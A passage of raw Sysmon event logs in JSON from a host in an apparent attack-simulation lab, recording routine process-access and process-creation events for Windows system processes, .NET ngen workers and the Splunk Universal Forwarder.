.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.492\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-00103D7F0B00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.492","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-00103D7F0B00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.492\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-00103D7F0B00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.492","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-00103D7F0B00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.664\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-0010A1820B00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.664","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-0010A1820B00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.664\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-0010A1820B00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.664","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-0010A1820B00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.664\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-0010A1820B00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.664","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-0010A1820B00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.196\r\nProcessGuid: {A837DB8D-0422-5F25-0000-0010AF860B00}\r\nProcessId: 4012\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.196","ProcessGuid":"{A837DB8D-0422-5F25-0000-0010AF860B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-0010AF860B00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-0010AF860B00}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-0010AF860B00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-0010AF860B00}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 